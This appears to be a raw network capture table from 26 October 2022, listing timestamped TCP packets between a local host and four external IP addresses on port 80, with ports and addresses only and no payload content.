Oct 26, 2022 13:16:25.591505051 CEST	49858	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:16:26.607023954 CEST	49859	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:16:26.762124062 CEST	80	49859	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:26.762419939 CEST	49859	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:16:26.762573004 CEST	49859	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:16:26.915186882 CEST	80	49859	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:26.930811882 CEST	80	49859	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:26.930888891 CEST	80	49859	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:26.931107998 CEST	49859	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:16:27.778274059 CEST	49859	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:16:28.794218063 CEST	49860	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:16:28.947010040 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:28.947380066 CEST	49860	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:16:28.947889090 CEST	49860	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:16:28.947995901 CEST	49860	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:16:29.100451946 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:29.100524902 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:29.100570917 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:29.100609064 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:29.100651026 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:29.100697041 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:29.100759983 CEST	49860	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:16:29.100931883 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:29.100938082 CEST	49860	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:16:29.101000071 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:29.101044893 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:29.101272106 CEST	49860	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:16:29.101437092 CEST	49860	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:16:29.253473043 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:29.253551006 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:29.253602028 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:29.253644943 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:29.253696918 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:29.253741026 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:29.253746033 CEST	49860	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:16:29.253783941 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:29.253878117 CEST	49860	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:16:29.253968000 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:29.254021883 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:29.254070997 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:29.254087925 CEST	49860	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:16:29.254266977 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:29.254321098 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:29.254367113 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:29.406621933 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:29.406692982 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:29.407018900 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:29.407085896 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:29.407140970 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:29.410176992 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:29.410257101 CEST	80	49860	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:29.410480976 CEST	49860	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:16:29.949733973 CEST	49860	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:16:30.965421915 CEST	49861	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:16:31.118161917 CEST	80	49861	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:31.118371964 CEST	49861	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:16:31.118534088 CEST	49861	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:16:31.271125078 CEST	80	49861	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:31.284734964 CEST	80	49861	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:31.284810066 CEST	80	49861	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:31.285207987 CEST	49861	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:16:31.285207987 CEST	49861	80	192.168.11.20	162.241.217.234
Oct 26, 2022 13:16:31.437860966 CEST	80	49861	162.241.217.234	192.168.11.20
Oct 26, 2022 13:16:36.644582033 CEST	49862	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:16:36.832535028 CEST	80	49862	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:36.832813025 CEST	49862	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:16:36.833005905 CEST	49862	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:16:37.020792961 CEST	80	49862	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:37.050643921 CEST	80	49862	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:37.050739050 CEST	80	49862	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:37.051033974 CEST	49862	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:16:37.838756084 CEST	49862	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:16:38.854188919 CEST	49863	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:16:39.041500092 CEST	80	49863	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:39.041712046 CEST	49863	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:16:39.041793108 CEST	49863	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:16:39.228730917 CEST	80	49863	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:39.245493889 CEST	80	49863	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:39.245505095 CEST	80	49863	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:39.245680094 CEST	49863	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:16:40.056921005 CEST	49863	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:16:41.072580099 CEST	49864	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:16:41.260948896 CEST	80	49864	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:41.261322021 CEST	49864	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:16:41.261776924 CEST	49864	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:16:41.261876106 CEST	49864	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:16:41.449692965 CEST	80	49864	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:41.449773073 CEST	80	49864	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:41.449827909 CEST	80	49864	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:41.449903011 CEST	49864	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:16:41.449985981 CEST	80	49864	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:41.450072050 CEST	80	49864	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:41.450198889 CEST	49864	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:16:41.450370073 CEST	49864	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:16:41.450386047 CEST	80	49864	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:41.450529099 CEST	80	49864	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:41.450587034 CEST	80	49864	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:41.450726986 CEST	49864	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:16:41.450872898 CEST	49864	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:16:41.637953997 CEST	80	49864	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:41.638180017 CEST	49864	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:16:41.638228893 CEST	80	49864	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:41.638417006 CEST	80	49864	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:41.638426065 CEST	49864	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:16:41.638540030 CEST	80	49864	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:41.638605118 CEST	49864	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:16:41.638711929 CEST	80	49864	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:41.638768911 CEST	49864	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:16:41.639106035 CEST	80	49864	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:41.639450073 CEST	80	49864	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:41.679307938 CEST	80	49864	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:41.826276064 CEST	80	49864	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:41.826348066 CEST	80	49864	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:41.826395988 CEST	80	49864	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:41.826683044 CEST	80	49864	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:41.826750040 CEST	80	49864	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:42.275028944 CEST	49864	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:16:43.290914059 CEST	49865	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:16:43.480282068 CEST	80	49865	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:43.480487108 CEST	49865	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:16:43.480526924 CEST	49865	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:16:43.669617891 CEST	80	49865	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:45.874608040 CEST	80	49865	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:45.874674082 CEST	80	49865	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:45.875205040 CEST	49865	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:16:45.875300884 CEST	49865	80	192.168.11.20	104.140.149.212
Oct 26, 2022 13:16:46.064616919 CEST	80	49865	104.140.149.212	192.168.11.20
Oct 26, 2022 13:16:50.946130037 CEST	49866	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:16:51.260807991 CEST	80	49866	103.20.200.97	192.168.11.20
Oct 26, 2022 13:16:51.261080980 CEST	49866	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:16:51.261172056 CEST	49866	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:16:51.582513094 CEST	80	49866	103.20.200.97	192.168.11.20
Oct 26, 2022 13:16:51.582693100 CEST	49866	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:16:52.273058891 CEST	49866	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:16:53.288674116 CEST	49867	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:16:53.644737005 CEST	80	49867	103.20.200.97	192.168.11.20
Oct 26, 2022 13:16:53.645083904 CEST	49867	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:16:53.645085096 CEST	49867	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:16:54.007805109 CEST	80	49867	103.20.200.97	192.168.11.20
Oct 26, 2022 13:16:54.008133888 CEST	49867	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:16:54.647418022 CEST	49867	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:16:55.663178921 CEST	49868	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:16:55.978203058 CEST	80	49868	103.20.200.97	192.168.11.20
Oct 26, 2022 13:16:55.978509903 CEST	49868	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:16:55.979187012 CEST	49868	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:16:56.294581890 CEST	80	49868	103.20.200.97	192.168.11.20
Oct 26, 2022 13:16:56.294694901 CEST	80	49868	103.20.200.97	192.168.11.20
Oct 26, 2022 13:16:56.294760942 CEST	80	49868	103.20.200.97	192.168.11.20
Oct 26, 2022 13:16:56.294872999 CEST	49868	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:16:56.294996023 CEST	49868	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:16:56.295221090 CEST	49868	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:16:56.609808922 CEST	80	49868	103.20.200.97	192.168.11.20
Oct 26, 2022 13:16:56.609838963 CEST	80	49868	103.20.200.97	192.168.11.20
Oct 26, 2022 13:16:56.610100031 CEST	80	49868	103.20.200.97	192.168.11.20
Oct 26, 2022 13:16:56.610131979 CEST	49868	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:16:56.610264063 CEST	49868	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:16:56.610328913 CEST	80	49868	103.20.200.97	192.168.11.20
Oct 26, 2022 13:16:56.610549927 CEST	80	49868	103.20.200.97	192.168.11.20
Oct 26, 2022 13:16:56.610726118 CEST	80	49868	103.20.200.97	192.168.11.20
Oct 26, 2022 13:16:56.610996008 CEST	80	49868	103.20.200.97	192.168.11.20
Oct 26, 2022 13:16:56.925506115 CEST	80	49868	103.20.200.97	192.168.11.20
Oct 26, 2022 13:16:56.925606012 CEST	80	49868	103.20.200.97	192.168.11.20
Oct 26, 2022 13:16:56.925668001 CEST	80	49868	103.20.200.97	192.168.11.20
Oct 26, 2022 13:16:56.944330931 CEST	80	49868	103.20.200.97	192.168.11.20
Oct 26, 2022 13:16:56.944595098 CEST	49868	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:16:56.990710020 CEST	49868	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:16:58.006174088 CEST	49869	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:16:58.272228003 CEST	80	49869	103.20.200.97	192.168.11.20
Oct 26, 2022 13:16:58.272447109 CEST	49869	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:16:58.272543907 CEST	49869	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:16:58.544781923 CEST	80	49869	103.20.200.97	192.168.11.20
Oct 26, 2022 13:16:58.545248032 CEST	49869	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:16:58.545362949 CEST	49869	80	192.168.11.20	103.20.200.97
Oct 26, 2022 13:16:58.811542988 CEST	80	49869	103.20.200.97	192.168.11.20
Oct 26, 2022 13:17:03.588274956 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:03.607867002 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:03.608083963 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:03.608242989 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:03.666836023 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.474370956 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.474448919 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.474500895 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.474550009 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.474600077 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.474652052 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.474656105 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.474703074 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.474714994 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.474752903 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.474798918 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.474823952 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.474970102 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.495882034 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.495960951 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.496015072 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.496067047 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.496115923 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.496166945 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.496217966 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.496274948 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.496294022 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.496354103 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.496387005 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.496486902 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.496722937 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.497343063 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.497421980 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.497474909 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.497525930 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.497574091 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.497623920 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.497673988 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.497719049 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.497725010 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.497776031 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.497786045 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.497827053 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.497978926 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.516401052 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.516485929 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.516540051 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.516590118 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.516639948 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.516685963 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.516694069 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.516743898 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.516793013 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.516845942 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.516872883 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.516896963 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.516921997 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.516949892 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.516999960 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.517018080 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.517051935 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.517101049 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.517143965 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.517152071 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.517191887 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.517204046 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.517254114 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.517306089 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.517311096 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.517451048 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.517528057 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.517635107 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.517739058 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.517796993 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.517846107 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.520838976 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.520917892 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.520972013 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.521023035 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.521064043 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.521073103 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.521123886 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.521173954 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.521208048 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.521223068 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.521274090 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.521322966 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.521359921 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.521372080 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.521423101 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.521471977 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.521505117 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.521522045 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.521553040 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.521572113 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.521616936 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.521663904 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.521713018 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.521713972 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.521879911 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.536967039 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.537044048 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.537091017 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.537136078 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.537178040 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.537209034 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.537229061 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.537271976 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.537276030 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.537318945 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.537363052 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.537401915 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.537410975 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.537450075 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.537460089 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.537509918 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.537560940 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.537609100 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.537611961 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.537667036 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.537718058 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.537765026 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.537781954 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.537811995 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.537863016 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.537911892 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.537962914 CEST	80	49870	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:04.537970066 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.538125038 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.538125038 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:04.614222050 CEST	49870	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:05.629904032 CEST	49871	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:05.649940968 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:05.650255919 CEST	49871	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:05.650361061 CEST	49871	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:05.711054087 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.144042969 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.144131899 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.144195080 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.144248962 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.144300938 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.144395113 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.144404888 CEST	49871	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:06.144443035 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.144484997 CEST	49871	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:06.144496918 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.144539118 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.144661903 CEST	49871	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:06.144881010 CEST	49871	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:06.153021097 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.153280020 CEST	49871	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:06.164402008 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.164505005 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.164561033 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.164619923 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.164674044 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.164725065 CEST	80	49871	51.91.236.193	192.168.11.20
Oct 26, 2022 13:17:06.164763927 CEST	49871	80	192.168.11.20	51.91.236.193
Oct 26, 2022 13:17:06.164787054 CEST	80	49871	51.91.236.193	192.168.11.20
